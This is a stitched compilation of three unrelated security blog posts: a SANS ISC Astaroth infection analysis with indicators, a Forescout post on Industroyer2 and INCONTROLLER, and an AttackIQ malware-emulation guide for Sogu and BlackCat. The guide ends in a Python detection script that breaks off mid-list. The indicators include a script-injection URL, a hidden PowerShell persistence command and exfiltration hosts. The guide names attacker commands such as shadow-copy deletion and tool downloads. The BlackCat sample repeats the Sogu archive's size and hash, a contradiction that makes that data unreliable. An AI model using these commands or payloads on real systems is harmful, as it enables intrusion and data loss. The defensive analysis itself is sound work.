Shown above:  Screenshot of the malicious email with link to download a malicious zip archive.


Shown above:  Link from email leads to web page pretending to be from Docusign that provides malicious zip archive for download.


Shown above:  Downloaded zip archive contains a Windows shortcut and a batch file.  Both are designed to infect a vulnerable Windows host with Astaroth (Guildma).


Shown above:  Traffic from the infection filtered in Wireshark (part 1 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (part 2 of 3).


Shown above:  Artifact from the infected host’s C:\Users\Public directory.


Shown above:  Artifact on the infected host’s C: drive at C:J9oIM9JJ9oIM9J.jS.


Shown above:  Windows shortcut in the infected user’s Roaming\Microsoft\Windows\Start Menu\Programs\Startup directory to keep the infection persistent.


Shown above:  Directory with persistent files used for the Astaroth (Guildma) infection.


Shown above:  Astaroth (Guildma) performs post-infection data exfiltration through HTTP POST requests.

Indicators of Compromise (IOCs)

Link from email:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloud

IP address and TCP port for initial malicious domain:

172.67.217[.]95 port 80 – w7oaer.infocloudgruposolucaoecia[.]link

URL to legitimate website generated from iframe in the above traffic:

hxxp://www.intangiblesearch[.]it/search/home_page.php?db_name=%3Cscript%20src=%22https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js%22%3E%3C/script%3E%3Cscript%20type=%22text/javascript%22%20src=%22hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036%22%3E%3C/script%3E?

Traffic to initial malicious domain that provides zip archive download:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036
hxxp://w7oaer.infocloudgruposolucaoecia[.]link//inc.php?/gruposolucaoeciainfocloud
hxxp://w7oaer.infocloudgruposolucaoecia[.]link/YBZJPTBQV/482NJ8NS74J9/N6D6WW/gruposolucaoeciainfocloud_097.88933.61414z64y64

Traffic generated by Windows shortcut or batch file from the downloaded zip archive:


Data exfiltration through HTTP POST requests:

104.21.25[.]34:80 hcu11m2mkk2.rouepcgomfhejergdahjcfcugarfcmoa[.]tk POST /
172.67.165[.]46:80 j2vfrc7gddo.aeabihjpejprueuibdjmhfmdcpsfr[.]gq POST /

Example of downloaded zip archive:

SHA256 hash: f254f9deeb61f0a53e021c6c0859ba4e745169322fe2fb91ad2875f5bf077300

File size: 1,091 bytes
File name: gruposolucaoeciainfocloud_097.88933.61414.zip

Contents from the above zip archive:

SHA256 hash: 5ca1e9f0e79185dde9655376b8cecc29193ad3e933c7b93dc1a6ce2a60e63bba

File size: 338 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.cmd

SHA256 hash: db136e87a5835e56d39c225e00b675727dc73a788f90882ad81a1500ac0a17d6

File size: 1,341 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.lNk

Command from Windows shortcut in Windows Startup folder on the infected Windows host:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden -Command C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log

Files used for persistent infection:

SHA256 hash: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

File size: 893,608 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe
File description: Windows EXE for AutoIt v3, not inherently malicious

SHA256 hash: e31658734d3e0de1d2764636d1b8726f0f8319b0e50b87e5949ec162ae1c0050

File size: 246,116 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log
File description: Malicious data binary, AutoIt v3 compiled script run by above Windows EXE for AutoIt v3

Final words

A pcap of the infection traffic, the associated malware/artifacts, and the email that kicked off this infection are available here.

Brad Duncan
brad [at] malwre-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In our new threat briefing report, Forescout’s Vedere Labs presents the most detailed public technical analysis of Industroyer2 and INCONTROLLER (also known as PIPEDREAM), the newest examples of ICS-specific malware that were disclosed to the public almost simultaneously, on April 12 and 13. Thankfully, both Industroyer2 and INCONTROLLER were caught before causing physical disruption.

Although there have been previous reports about both malware families analyzed in this research, we present the following new contributions:

Description of a functionality in Industroyer2 to discover the target’s Common Address of ASDU. Despite not being used in the analyzed sample, given its hardcoded configuration, this might have been used in previous reconnaissance stages to gather information about the target.
An analysis of the similarity of the IEC-104 implementation in Industroyer that reveals it is probably a modified version of a publicly available implementation.
The most detailed public description so far of Lazycargo, a part of INCONTROLLER that became publicly available recently and is used to execute other parts of the malware.

In this post, we detail how Forescout helps to protect against the new malware. The full report also contains a list of indicators of compromise (IOCs) and recommended mitigations.

Overview of the new ICS-specific malware

Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 industrial protocol. INCONTROLLER is a full toolkit containing modules to send instructions to or retrieve data from ICS devices using industrial network protocols such as OPC UA, Modbus, CODESYS, Machine Expert Discovery and Omron FINS. Additionally, Industroyer2 has a highly targeted configuration, while INCONTROLLER is much more reusable across different targets.

ICS-specific malware is still very rare compared to commodity malware such as ransomware or banking trojans. Industroyer2 and INCONTROLLER follow previous known examples such as Stuxnet, Havex, BlackEnergy2, Industroyer and TRITON, shown in the timeline below.


Industroyer2 is believed to be developed and deployed by the Sandworm APT, linked to the Russian GRU, which was behind the original attacks on the Ukrainian power grid in 2015 and 2016. The Industroyer2 incident follows recent activity against the APT in 2022, such as the disruption of the Cyclops Blink botnet. There is still no conclusive evidence about the actors behind INCONTROLLER, their motives or objectives.

Both new malware families show that abusing the often insecure-by-design native capabilities of OT equipment continues to be the preferred modus operandi of real-world attackers. Vedere Labs recently disclosed a set of 56 insecure-by-design vulnerabilities in OT equipment called OT:ICEFALL, which included Omron controllers that were targeted by INCONTROLLER. The emergence of new vulnerabilities and new malware exploiting the insecure-by-design nature of OT supports the need for robust OT-aware network monitoring and deep packet inspection capabilities.

For more information and technical analysis, read the full report.


Mitigation recommendations for ICS malware

Forescout eyeInspect customers can follow the recommendations below to help ensure they are protected against Industroyer2 and INCONTROLLER.

Stay current with the release of additional content such as scripts and IOCs on the OT Portal or through your Forescout representatives.
Monitor network exposure for control systems and HMIs.
Monitor connections to devices outside of documented norms for the device and environment, with special attention to HTTP and Telnet connections to these devices.
Monitor unauthorized Telnet connection attempts, including the use of default credentials.
Detect ICMP usage, and especially possible ping sweeps, through the ICMP indicators in the Industrial Threat Library devoted to detecting possible port scans and discovery.
Apply additional configurations on eyeInspect to perform intrusion detection on known nodes. Available approaches include protocol blacklisting and communication whitelisting with traffic rules.
Leverage the Threat Detection Add-Ons script, which contains additional checks for lateral movement and user account manipulation that may reveal attempts to gain administrative rights.
Closely monitor the protocols abused by both new malware families for signs of anomalies: IEC-104 (2404/TCP), OPC UA (4840/TCP, 4843/TCP), Modbus (502/TCP), Machine Expert Discovery (27126/UDP, 27127/UDP), CODESYS (1740-1743/UDP, 11740-11743/TCP, 1105/TCP) and Omron FINS (9600/TCP, 9600/UDP). Below are specific recommendations for each protocol in eyeInspect.

IEC-104

eyeInspect has extensive coverage of IEC-104 anomalies with malformed packet detection (possible indicator of exploit), anomaly baselining detection and a vast Industrial Threat Library covering anomalous behaviors, dangerous operations and much more.

OPC UA

Monitor the alerts and events related to the OPC UA protocol. eyeInspect offers dozens of events related to anomalies like credential bruteforcing, bad certificate usage, anomalous connection attempts, configuration changes and changes to OPC UA tags.
Monitor OPC UA connections, especially newly established or anomalous OPC UA connections through dedicated filters, analytics, maps and the change logs.

MODBUS/Schneider Electric

Monitor the alerts and events related to the MODBUS protocol. eyeInspect offers dozens of events related to anomalies like error codes associated with abnormal device crashes/reboots, files uploaded or downloaded, file deletion, unauthorized changes in device configuration and execution of commands.
Add an anomaly detection-specific blacklisting rule on ports 27126 and 27127 that target IP broadcast 255.255.255.255, to identify the Machine Expert Discovery protocol used in the initial phase. (A premade profile is available on request through Forescout representatives or Customer Support.)
Install the new Device and Visibility Addons Script 3.2 (or newer) to detect and vet devices using this discovery protocol.

OMRON FINS

Implement the OMRON FINS Monitor script to receive more alerts and details about unauthorized changes in device configuration and execution of commands, files uploaded or downloaded and tons of other anomalies (available on request through Forescout representatives).

The post Industroyer2 and INCONTROLLER: New Findings and How Forescout Protects Against the Most Recent ICS-Specific Malware appeared first on Forescout.


Malware often forms the foundation for an adversary cyberattack, giving adversaries a means to employ a range of tactics, techniques, and procedures (TTPs) against a target to achieve their strategic objectives. For analysts, adversary malware also provides insights into an adversary’s behavior when more complete incident response data is unavailable, particularly at the procedure level. Defenders can then improve their security posture by testing their defenses against the malware in advance, but only if the assessment can be done easily.

Attack graphs give us a means of arranging real-world malware into its component TTPs to run emulations, and today we are immensely excited to announce our new malware emulation attack graphs.

How do we build it? AttackIQ’s adversary research team analyzes real-world malware and then arranges the TTPs into a logical flow that emulates specific adversary behaviors. The resulting attack graph gives you a cornerstone of hard data – a detailed adversary emulation – to run against your security program and test your defense performance.

What sets malware emulation attack graphs apart from AttackIQ’s other attack graphs is their focus on the TTPs made possible by the malware itself (rather than in an entire adversary intrusion sequence, which could include manual TTPs). Often in incident reports, malware TTPs are either unknown or not understood. Analysts often don’t know whether the TTPs reported in an incident are features of the malware itself, or if they are employed by an intruder manually. AttackIQ’s malware emulation attack graphs focus on key aspects of malware used across many campaigns. They give defenders the opportunity to validate and tune their endpoint security controls and network security controls against each logical stage of a specific malware strain.

Specifically, a malware-based threat assessment helps defensive teams to:

identify core behavior observed in specific malware samples
identify the security technologies that can detect and prevent behaviors in specific malware samples
evaluate the efficacy of defensive technologies (and the overarching security stack) in detecting and preventing specific malware behaviors; and
identify gaps in the team’s security posture that could be filled or improved to detect and prevent specific TTPs.

To kick off these new attack graphs, we chose the ever-prevalent Sogu (a.k.a. PlugX) remote access tool (RAT) and the recent Rust-based ransomware, BlackCat (a.k.a. ALPHV). We will cover these new additions to the AttackIQ Security Optimization Platform in a live demo on May 26, 2022 at 10:00 hrs PT.

Sogu (PlugX)

Sogu (a.k.a. PlugX) is a full-featured, modular RAT with many variants and is used by multiple China-based groups within the espionage threat class, including APT41, APT10, UNC124, Mustang Panda, and others. Sogu has been around for more than a decade, with early reporting as far back as 2008, yet it continues to target victims around the world, including the semiconductor industry and nation-state governments.

Our Sogu/PlugX attack graph is derived from a sample used in an intrusion by China-based threat actors that targeted the semiconductor and high-tech subsector of the manufacturing industry in July 2020.

This sample was delivered in a self-extracting (SFX) RAR file which contains three files required to implement a DLL side-loading method of execution. When this SFX RAR file is opened by an unwitting user, these files are written to disk and the executable is run.

Legitimate kick-off executable (in the sample analyzed this was a McAfee program).
Hijacked DLL that loads/launches Sogu/PlugX (this DLL is considered hijacked because the legitimate program will natively load the DLL).
Encrypted file holding encrypted Sogu shellcode payload.

This method and required set of files is commonly seen with Sogu/PlugX variants.

Metadata from the sample analyzed

Description: SFX RAR file
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Description: Legitimate exe file
Size (bytes): 140576
SHA1: d201b130232e0ea411daa23c1ba2892fe6468712

Description: Hijacked DLL, loads the payload file
Size (bytes): 199168
SHA1: 040ae092a0ab8801a92c4d0d533a03ce13595e1f

Description: Encrypted payload file
Size (bytes): 121128
SHA1: eb9f611889ef99c7b0c4006e1dea50dd5a8c7f93

This attack graph focuses on the sample’s core TTPs, captured by the following scenarios that emulate behavior as the malware progresses through its code execution.

Attack Graph: Sogu

Scenarios 1 and 2: Initial Access: Spearphishing (T1566.002): Sogu is commonly delivered to targets using spearphishing links. For the first scenario in the graph, we begin with the step after a link was clicked by downloading the SFX RAR file package to the endpoint, giving A/V and potentially network security controls the opportunity to detect and/or prevent delivery.

1a. Detection Process

Parent Process Name == (Winword.exe OR Excel.exe OR Powerpnt.exe)
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("DownloadString" OR "DownloadFile") AND "HTTP" AND ("Invoke-Expression" OR "IEX"))

1b. Mitigation Policies

MITRE recommends the following mitigations for T1566.002:

M1047
M1021
M1054
M1018
M1017

Scenario 3: Save Malicious DLL to Disk: If the SFX RAR file is successfully opened, the trio of files will be written to the victim’s disk. Of these three files, the malicious DLL gives another opportunity to test A/V protection since it isn’t obfuscated like the encrypted Sogu shellcode payload file. This scenario saves the constituent hijacked DLL to disk, mimicking the SFX RAR file’s write operation to the host machine.

3a. Detection Process

While A/V, NGAV and EPP security controls excel at detecting malicious files being saved to disk, Application Control technologies provide opportunities to detect unsigned DLLs being saved to disk. Further, execution of unsigned filetypes (such as DLLs) specified in your Application Control policies can be prevented/blocked. Additionally, EDR technologies have the ability to detect these unsigned filetypes being saved to globally writable directories on devices. However, the latter may be prone to false positives and lead to excessive alerts. In addition to looking for unsigned DLLs being placed in globally writable directories, using YARA detections to look for strings in malware files is an alternate and effective way of detecting this activity on your endpoints:

PlugX / Sogu YARA Rules

3b. Mitigation Policies

Ensure that devices are placed within a protective (not detective) antivirus policy to act on files through static and dynamic analysis.
Ensure account management is correctly configured through group policy, ensuring proper users only have rights to write to sensitive areas on disk.
Ensure application control technology policies are thought-through, tuned and maintained; you can get very granular with what types of files are indexed and can execute on which systems in your network. For example, self-extracting RAR files can be banned entirely on your network, or unsigned DLLs can be prevented from executing. Attempted execution of banned files is logged and can flow into your SIEM for further alerting or correlation.

Scenario 4: Hijack Execution Flow: DLL Side-Loading (T1574.002): Once the three files are written to disk, the SFX RAR file automatically runs the legitimate McAfee executable, leading to the DLL side-loading technique. In DLL side-loading, the legitimate binary attempts to load a required DLL and, instead of loading the normal benign DLL, a hijacked version is loaded because it resides in the same directory as the McAfee executable.

4a. Detection Process

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the DLL extracted from the RAR file. This binary name is subject to change)
Imageload is_signed == False

4b. Mitigation Policies

MITRE recommends the following mitigations for T1574.002:

M1013
M1051

Additionally, if the legitimate file that is used to load a DLL is not a binary needed for your organization, add the hashes to your application control block lists as soon as possible. Binaries on a block list will not be able to execute even if they are benign by nature.

Scenario 5: Process Injection (T1055.001): Sogu uses process injection both reflectively and remotely to evade defenses. Malicious code can sometimes go undetected by security products because it is running inside a legitimate process. Our emulation mimics DLL code injection by using Windows API calls to LoadLibrary and CreateRemoteThread to inject code into a legitimate process.

5a. Detection Process

Utilize tools such as Procmon.exe or EDR tools to monitor for system Windows API calls such as “LoadLibrary” and “CreateRemoteThread” with unsigned or unrecognized binaries, especially if they are coming from locations that are globally writable or not belonging to the associated injected process.

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the .dll extracted from the RAR file. This binary name is subject to change)
Imageload is_signed == False

5b. Mitigation Policies

MITRE recommends the following mitigations for T1055.001:

M1040

Scenario 6: Persistence via Windows Service (T1543.003): If the malware executes with elevated privilege, persistence is established by creating a new service that will initiate the execution of the benign McAfee binary, starting the process of malicious code execution again.

6a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (('sc' OR 'sc.exe') AND 'create' AND 'binpath="<path to trusted executable>"' AND 'start="auto"')

6b. Mitigation Policies

MITRE recommends the following mitigations for T1543.003:

M1047
M1040
M1045
M1028
M1018

Scenario 7: Persistence via Registry Run Key (T1547.001): Alternatively, if the malware is executed as a normal user, persistence is achieved using a standard registry run key. Our attack graph will take this persistence path if the service creation is prevented in the previous scenario.

7a. Detection Process

As registry key modifications are typical Windows system behavior, what is unusual is registry actions attempted by unexpected or underprivileged users. This detection excludes administrative or expected users to reduce false positives from expected system usage.

Process Name == (cmd.exe OR powershell.exe)

User NOT IN <list of expected reg.exe users>

Command Line CONTAINS ((reg OR reg.exe) AND ("HKEY_CURRENT_USER" OR "HKEY_LOCAL_MACHINE") AND "SOFTWARE\Microsoft\Windows\CurrentVersion" AND ("run" OR "runonce"))

7b. Mitigation Policies

Although it is expected Windows behavior for this registry key to be modified so that programs start at boot, modification of these registry keys can be constrained through group policy and application control/whitelisting, allowing only authorized users to use tools such as cmd.exe, powershell.exe, reg.exe, and regedit.exe.

Scenarios 8 and 9: Command and Control: DNS (T1071.004): After persistence is set, the malware establishes communication with command and control (C2) infrastructure by abusing the Domain Name System (DNS) application layer protocol to avoid detection/network filtering.

This Sogu sample is configured to send DNS callouts in TXT records that carry encoded victim information prepended to the threat actor-controlled domain. Example:

ENCODEDDATA.ENCODEDDATA.ENCODEDDATA.badSubdomain.badDomain.bad

An initial DNS request is sent through a hardcoded public Google DNS server, 8.8.8.8, which we assess to be a way around potential internal network DNS blacklisting implemented by the victim organization’s security team.

If the Google DNS resolution fails, potentially due to web proxy or DNS policy disallowing external DNS requests, a fallback callout that is identical in content is sent to the host’s default DNS server. Our scenario emulates the structure of the encoded data in these callouts and is sent to AttackIQ infrastructure. This provides defenders the opportunity to build network detections for anomalous DNS traffic like this, which could prove useful beyond Sogu detection.

8a. Detection Process

Typically, C2 traffic is sent through HTTP/HTTPS which is often monitored by network firewalls and content filtering security controls. Threat actors using Sogu/PlugX utilize the DNS protocol to remain undetected. Creating network Snort rules to alert on any UDP 53 connections to flagged IPs may be an effective way to alert on possible C2 activity from threat actors utilizing this technique.

alert udp any 53 -> $HOME_NET any (msg:"*"; rev:001; content:"|43 D7 41 85|";)

Please note, the content portion here is a hash representation of the destination IP address for the DNS request (i.e., to the C2). This portion should be modified as IP artifacts are collected.

8b. Mitigation Policies

MITRE recommends the following mitigations for T1071.004:

M1037
M1031

Scenario 10: Input Capture: Keylogging (T1056.001): With the C2 channel established, the running implant can now receive commands or Sogu plugins enabling additional capability from the external C2 server. One of the most common commands received is the enabling of keylogging functionality. The scenario uses a system hooking routine to capture any keystrokes using calls to the Windows API.

10a. Detection Process

MITRE detection recommendations for T1056.001:

DS0009
DS0027

Scenario 11: Windows Command Shell (T1059.003): Another post-exploitation behavior of Sogu is the use of the Windows command shell for execution of reconnaissance commands. If the keylogger activity in the previous scenario is prevented by security controls, a command shell is initiated and the following commands are executed: ipconfig, whoami, systeminfo

11a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS "systeminfo"
User NOT IN [<list of expected administrators to be issuing these commands>]

11b. Mitigation Policies

MITRE mitigation Recommendations for T1059.003:

M1038

Additionally, ensure that Group Policy is set and enforced to allow only authorized users/administrators to be able to run cmd.exe or powershell.exe. These interpreters can be limited to lower privileged or unneeded users to prevent enumeration or abuse.

Scenario 12: Data Exfiltration Over HTTP (T1048.003): In our final technique of the attack graph, we emulate exfiltration of data over HTTP by compressing mocked data and transmitting to an AttackIQ controlled server.

12a. Detection Process

MITRE detection Recommendations for T1048.003:

DS0017
DS0022

12b. Mitigation Policies

MITRE mitigation Recommendations for T1048.003:

M1057
M1037
M1031
M1030

BlackCat (ALPHV) Ransomware

BlackCat (a.k.a. ALPHV) emerged as Ransomware-as-a-Service (RaaS) as early as mid-November 2021, providing would-be attackers with a highly configurable multi-platform ransomware strain written in Rust. BlackCat operators use the double-extortion model, which not only encrypts victim data but also threatens public exposure of sensitive information that was collected and exfiltrated prior to ransomware deployment.

According to an April 2022 FBI report, BlackCat has compromised at least 60 organizations worldwide through March 2022. True to the nature of RaaS, victim sectors are wide ranging, and have been reported to include German oil, European port authorities, high-end fashion/apparel, and higher education institutions in the United States.

The sample analyzed for our content development was obtained from a known public malware repository and was first submitted to VirusTotal in December 2021.

Sample Metadata

Description: BlackCat.exe (Win32)
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Our BlackCat attack graph emulates a series of core behaviors beginning with introducing the ransomware to the environment, moving through configuration of the host for efficient and effective encryption, preparation for propagation, and finally to BlackCat’s ransomware encryption method.

Attack Graph: BlackCat

Scenarios 1 and 2: Ingress Tool Transfer (T1105): Intruders bring BlackCat into a victim environment after it has been breached. To begin this attack graph, we assume that initial access has been achieved and we emulate the introduction of the ransomware to the endpoint. This pair of scenarios downloads and saves a Windows-based BlackCat sample to disk, giving A/V security controls an opportunity to detect inbound tool delivery, as well as uploads to memory.

1a. Detection Process

Once a malicious actor has compromised an endpoint, they may attempt to transfer tools or malware onto the device using built-in utilities such as PowerShell, Certutil, Bitsadmin, and Curl.

PowerShell Example:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest” OR “DownloadData” OR “DownloadFile”) AND “Hidden”)

The download cmdlet (or its IWR alias) and the WebClient methods are alternatives, so they are combined with OR; requiring both in the same command line would almost never match. “Hidden” (as in -WindowStyle Hidden) is what separates a scripted download from an administrator working interactively.

Certutil Example:

Process Name == Certutil.exe
Command Line Contains (“-urlcache” AND “-f”)

Bitsadmin Example:

Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)

Curl Example:

Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)

1b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Additionally, it is advised that non-administrators be prevented from running tools such as powershell.exe, cmd.exe, and certutil.exe, for example through AppLocker or WDAC rules. This limits malicious use of these tools from end-user accounts.

Scenario 3: Windows Management Instrumentation (WMI) Commands (T1047): One of the first things BlackCat does is read the host machine’s hardware UUID (the Win32_ComputerSystemProduct UUID), which it uses to build a unique victim identifier for the ransom process. The malware retrieves this value with a living-off-the-land tool, the WMI command-line client, by issuing “wmic csproduct get UUID”.

3a. Detection Process

Developing a baseline of typical binaries that wmiprvse.exe invokes in your environment, then utilizing that baseline to make a detection is a good step in monitoring abnormal Windows Management Instrumentation activity. For example, creating a detection to alert on processes not in a list of known processes being invoked from wmiprvse.exe would identify possible malicious activity.

Monitoring the endpoint for the following would also alert on possible suspicious use. The first rule covers WMI-based process execution in general; the second matches the specific query BlackCat issues:

Process Name == wmic.exe
Command Line CONTAINS (“Process call create” AND (“.dll” OR “.exe”))

Process Name == wmic.exe
Command Line CONTAINS (“csproduct” AND “UUID”)

The UUID query is also issued by legitimate inventory and management agents, so baseline it against the parent process before alerting on it.

3b. Mitigation Policies

MITRE mitigation Recommendations for T1047:

M1040
M1038
M1026
M1018

Additionally, ensure only administrators are authorized to utilize the Windows Management Instrumentation as this tool may be utilized for enumeration, lateral movement, and command execution as seen in this scenario.

Scenario 4: Impair Defenses: Disable or Modify Tools (T1562.001): Here, we implement a new custom scenario that emulates BlackCat’s enabling of remote-to-local and remote-to-remote symbolic link evaluation on the host with “fsutil behavior set SymlinkEvaluation R2L:1 R2R:1”. Enabling remote symbolic links expands the set of remote file locations the host can reach for encryption and creates additional pathways for propagation.

4a. Detection Process

Process Name == (cmd.exe OR powershell.exe OR fsutil.exe)
Command Line CONTAINS (“fsutil” AND “SymlinkEvaluation” AND (“R2L:1” OR “R2R:1”))

4b. Mitigation Policies

MITRE mitigation Recommendations for T1562.001:

M1022
M1024
M1018

Scenario 5: Modify Registry (T1112): In this scenario we emulate BlackCat’s setting of a registry value that raises the maximum number of simultaneous outstanding SMB requests the host’s server service accepts per client, likely to avoid stalls while encrypting files on remote shares. The “MaxMpxCt” value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters is set to 65535.

5a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“reg” OR “reg.exe”) AND “add” AND “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” AND “/v MaxMpxCt”)

The hive may also appear abbreviated as HKLM\..., so match on the “LanmanServer\Parameters” suffix rather than the full path, and treat the /v switch as case-insensitive.

5b. Mitigation Policies

MITRE mitigation Recommendations for T1112:

M1024

Scenario 6: File Deletion: Volume Shadow Copy (T1070.004): Using the Windows command shell, this scenario reproduces the deletion of Volume Shadow Copies with vssadmin. BlackCat and other ransomware families use this technique (also catalogued by ATT&CK as Inhibit System Recovery, T1490) to restrict the victim’s ability to restore encrypted files from local snapshots.

6a. Detection Process

Process Name == vssadmin.exe
Command Line CONTAINS (“delete shadows”)

6b. Mitigation Policies

It is recommended that group policy settings and Application Control/whitelisting software is set to only allow authorized users access to tools such as vssadmin.exe, cmd.exe, and powershell.exe to prevent misusage if an account is compromised.

Additionally, ensure that backup files are set to only be accessed by authorized personnel. These backup files should not have read or write access to underprivileged user accounts.

Scenario 7: System Network Configuration Discovery (T1016): If configured to do so, BlackCat will propagate across the victim’s local network. To spread to neighboring machines it first needs discovery actions that identify the pathways available from the origin host. The scenario reproduces BlackCat’s network share discovery (via the “net” command) and its enumeration of the ARP cache with “arp -a” to map neighboring hosts and their MAC addresses.

7a. Detection Process

Typically, system enumeration is carried out with built-in Windows utilities, which lets an attacker learn about the target environment without dropping malware or tooling that AV might flag. Because the same commands are run legitimately, the following detections should be tuned against expected users such as network administrators to reduce false positives:

Enumeration through “net” command

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ((“net” OR “net.exe”) AND “use”)
User NOT IN <list of expected net.exe users>

Enumeration through “arp” command

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“arp -a”)
User NOT IN <list of expected network admins>

7b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously once a threat actor holds a compromised account. To reduce this information disclosure, cmd.exe and powershell.exe should be restricted to the administrative users who need them.

Additionally, enable Audit Process Creation so that event ID 4688 is generated, and enable the GPO setting “Include command line in process creation events”; without it, 4688 records the image name but not the arguments the detections above depend on. Command-line events can then be forwarded from all endpoints to a SIEM for filtering, tuning and correlation to detect anomalous activity.

Scenario 8: Ingress Tool Transfer (T1105): BlackCat carries a copy of the PsExec utility in its resources that is written to disk and likely used to spread itself if configured for propagation. In the sample we analyzed propagation is not enabled, however we included this behavior because it is a configurable option and a tool commonly abused by attackers to achieve various results including moving files over the network and remote process execution.

8a. Detection Process

PsExec is not malicious by nature; it is a Microsoft-published Sysinternals tool and is signed by Microsoft. It can nevertheless be used to move laterally within a network and should be monitored so that only authorized usage occurs. If it is not an expected binary for network administrators in your environment, periodically search endpoints for the file so that copies placed without approval are found. PsExec with alternate credentials specified on the command line (-u/-p) produces a network logon (type 3) followed by an interactive logon (type 2) on the target; PsExec versions before 2.1 send those credentials across the network in cleartext, and the type 2 logon leaves them exposed to theft from memory on the target host. PsExec without explicit credentials is a type 3 logon only and does not leave credentials on the target.

8b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Even legitimate use of PsExec is still problematic from a security perspective. For the best security posture, PsExec should be blocked from executing everywhere through Application Control/allowlisting software. Authorized PowerShell Remoting is a more secure and preferred option for legitimate type 3 logons in your environment and does not leave credentials on the target host.

Scenario 9: File and Directory Discovery (T1083): At this stage of the kill chain, BlackCat preps for file encryption by enumerating the filesystem searching for data to encrypt.

9a. Detection Process

Searching the file system on Windows machines is typically done from the command line with the “dir” command. This is normal Windows behavior, but monitoring for it can still help identify malicious actions in your environment. Enumeration output is often redirected to a file for later examination or exfiltration by the attacker:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“dir” AND “>”)

Please note, this detection can be very loud if end users or administrators commonly search the file system and save results with the “>” argument. To narrow this detection down, add in sensitive file paths that are not often viewed by typical end users to increase fidelity.
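The command-line detections for scenarios 1 through 9 above are written as pseudo-rules. The following is an added example (not AttackIQ’s code) that implements them as regular expressions over 4688-style process-creation records, so that the rules can be tested against sample command lines before they go into a SIEM. The events, the CORP\netadmin allowlist, and the tuning of each pattern are constructed for this example; the PowerShell rule combines the download cmdlet and WebClient methods with OR, the WMI rule adds BlackCat’s “csproduct get UUID” query, and the net/arp rules use word boundaries so that “netsh” or “dotnet” do not match.

```python
import re
from dataclasses import dataclass

# Accounts expected to run net.exe / arp.exe (assumed allowlist, lower-cased).
EXPECTED_NET_USERS = {"corp\\netadmin"}
SHELLS = frozenset({"cmd.exe", "powershell.exe"})


@dataclass(frozen=True)
class ProcEvent:
    process: str   # image name from the 4688 NewProcessName field
    cmdline: str   # CommandLine field (needs the "include command line" GPO)
    user: str      # SubjectUserName as DOMAIN\user


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    processes: frozenset
    pattern: re.Pattern
    check_user: bool = False   # suppress the hit when the user is allowlisted


def _rx(p):
    return re.compile(p, re.IGNORECASE)


# One Rule per pseudo-rule on the page; lookaheads give "A AND B" semantics.
RULES = [
    Rule("ps_download", "T1105", SHELLS,
         _rx(r"(?=.*\b(iwr|invoke-webrequest|downloaddata|downloadfile)\b)(?=.*\bhidden\b)")),
    Rule("certutil_urlcache", "T1105", frozenset({"certutil.exe"}),
         _rx(r"(?=.*-urlcache)(?=.*\s-f\b)")),
    Rule("bitsadmin_transfer", "T1105", frozenset({"bitsadmin.exe"}),
         _rx(r"(?=.*/transfer)(?=.*http)")),
    Rule("curl_output", "T1105", frozenset({"curl.exe"}),
         _rx(r"(?=.*http)(?=.*\s-o\b)")),
    Rule("wmic_exec_or_uuid", "T1047", frozenset({"wmic.exe"}),
         _rx(r"(process\s+call\s+create.*\.(dll|exe))|(csproduct.*uuid)")),
    Rule("fsutil_symlink", "T1562.001", SHELLS | {"fsutil.exe"},
         _rx(r"symlinkevaluation.*\b(r2l|r2r):1\b")),
    Rule("reg_maxmpxct", "T1112", SHELLS | {"reg.exe"},
         _rx(r"\breg(\.exe)?\s+add\b.*lanmanserver\\parameters.*/v\s+maxmpxct")),
    Rule("vssadmin_delete", "T1070.004", frozenset({"vssadmin.exe"}),
         _rx(r"delete\s+shadows")),
    Rule("net_use", "T1016", SHELLS | {"net.exe"},
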